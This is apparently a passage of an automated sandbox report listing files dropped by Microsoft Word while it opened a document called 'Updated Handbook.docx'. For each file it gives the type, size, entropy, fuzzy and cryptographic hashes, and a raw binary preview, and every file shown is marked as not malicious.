                                                                                                                                                                                                                                                                Entropy (8bit):4.707381739440028
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:4xtQl3YFvVgxWjb7yEteOveljsljAlCxmwvwjdlJmWSXvlm6t1tIavGmZp/t:8DdKcb+s/veOjAeoD0Vv8nBmV
                                                                                                                                                                                                                                                                MD5:EE9F4E7FEB932A707AC647F108E6BD37
                                                                                                                                                                                                                                                                SHA1:6B9CA5395CED8CFF9C8BF5557A501CED9AC23E1B
                                                                                                                                                                                                                                                                SHA-256:DF070AC43C32ED056BCF74321E76A50ECEB5AE8D165717C1706DAB60ACBB9723
                                                                                                                                                                                                                                                                SHA-512:A57F478061E1939531CE1545EBF5F840DE962D08BF763C49CA835A7DC3CAA3BACCD30259220A2FA8A8102B9932FA87669F49F41087DAAC7FFDBA50D7F1D578A3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:L..................F.... .....0...............U......<......................z.x.2..<...Y.j .UPDATE~1.DOC..\......DWR`.Y.j..............................U.p.d.a.t.e.d. .H.a.n.d.b.o.o.k...d.o.c.x.......[...............-.......Z............F.......C:\Users\user\Desktop\Updated Handbook.docx..,.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.U.p.d.a.t.e.d. .H.a.n.d.b.o.o.k...d.o.c.x.`.......X.......035347...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Generic INItialization configuration [folders]
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):84
                                                                                                                                                                                                                                                                Entropy (8bit):4.719773680563778
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:H7rESd5om4VSd5opnbJlv:H7rEk5Ok5iv
                                                                                                                                                                                                                                                                MD5:7CFFF83457DA4ABB74AA2CDD9C1906D9
                                                                                                                                                                                                                                                                SHA1:AB2CE30CEEEA0982CE4C8B043F255FFAB12024DB
                                                                                                                                                                                                                                                                SHA-256:3F1918E3BFB6391D6C11E34BEDA45C452632C3201085F3E4510FA5008BC6F48B
                                                                                                                                                                                                                                                                SHA-512:62174DCEC787F4E1ECA9F9FC092FFEC370236209A380FED12A1FD6BFE324DF26FFB541F55EAFF539109FB0DCB6E784E0066F31BE32A684180610CABAF0483913
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[misc]..Updated Handbook.LNK=0..[folders]..Updated Handbook.LNK=0..Templates.LNK=0..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):562113
                                                                                                                                                                                                                                                                Entropy (8bit):7.67409707491542
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                                                                                                                                                                                                MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                                                                                                                                                                                                SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                                                                                                                                                                                                SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                                                                                                                                                                                                SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1649585
                                                                                                                                                                                                                                                                Entropy (8bit):7.875240099125746
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                                                                                                                                                                                                MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                                                                                                                                                                                                SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                                                                                                                                                                                                SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                                                                                                                                                                                                SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):558035
                                                                                                                                                                                                                                                                Entropy (8bit):7.696653383430889
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                                                                                                                                                                                                MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                                                                                                                                                                                                SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                                                                                                                                                                                                SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                                                                                                                                                                                                SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):570901
                                                                                                                                                                                                                                                                Entropy (8bit):7.674434888248144
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                                                                                                                                                                                                MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                                                                                                                                                                                                SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                                                                                                                                                                                                SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                                                                                                                                                                                                SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):523048
                                                                                                                                                                                                                                                                Entropy (8bit):7.715248170753013
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                                                                                                                                                                                                MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                                                                                                                                                                                                SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                                                                                                                                                                                                SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                                                                                                                                                                                                SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3078052
                                                                                                                                                                                                                                                                Entropy (8bit):7.954129852655753
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                                                                                                                                                                                                MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                                                                                                                                                                                                SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                                                                                                                                                                                                SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                                                                                                                                                                                                SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):777647
                                                                                                                                                                                                                                                                Entropy (8bit):7.689662652914981
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                                                                                                                                                                                                MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                                                                                                                                                                                                SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                                                                                                                                                                                                SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                                                                                                                                                                                                SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):924687
                                                                                                                                                                                                                                                                Entropy (8bit):7.824849396154325
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                                                                                                                                                                                                MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                                                                                                                                                                                                SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                                                                                                                                                                                                SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                                                                                                                                                                                                SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):966946
                                                                                                                                                                                                                                                                Entropy (8bit):7.8785200658952
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                                                                                                                                                                                                MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                                                                                                                                                                                                SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                                                                                                                                                                                                SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                                                                                                                                                                                                SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1204049
                                                                                                                                                                                                                                                                Entropy (8bit):7.92476783994848
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                                                                                                                                                                                                MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                                                                                                                                                                                                SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                                                                                                                                                                                                SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                                                                                                                                                                                                SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):486596
                                                                                                                                                                                                                                                                Entropy (8bit):7.668294441507828
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                                                                                                                                                                                                MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                                                                                                                                                                                                SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                                                                                                                                                                                                SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                                                                                                                                                                                                SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):976001
                                                                                                                                                                                                                                                                Entropy (8bit):7.791956689344336
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                                                                                                                                                                                                MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                                                                                                                                                                                                SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                                                                                                                                                                                                SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
